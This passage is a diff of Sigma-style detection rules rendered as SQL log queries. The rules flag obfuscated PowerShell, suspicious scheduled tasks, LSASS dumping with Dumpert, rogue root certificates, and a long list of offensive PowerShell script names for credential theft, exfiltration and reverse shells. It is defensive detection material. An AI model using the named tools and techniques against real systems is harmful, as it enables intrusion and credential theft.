/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + 
"description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Admin activity (unclear what they do nowadays with finger.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "status": "test", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" ], - 
"filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", - "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_stdin.yml" + "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "Malicious PowerShell Scripts - PoshModule", - "id": "41025fd7-0466-4650-a813-574aaacbe7f4", - "status": "experimental", - 
"description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", - "author": "frack113, Nasreddine Bencherchali", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "status": "test", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo 
LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR 
ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE 
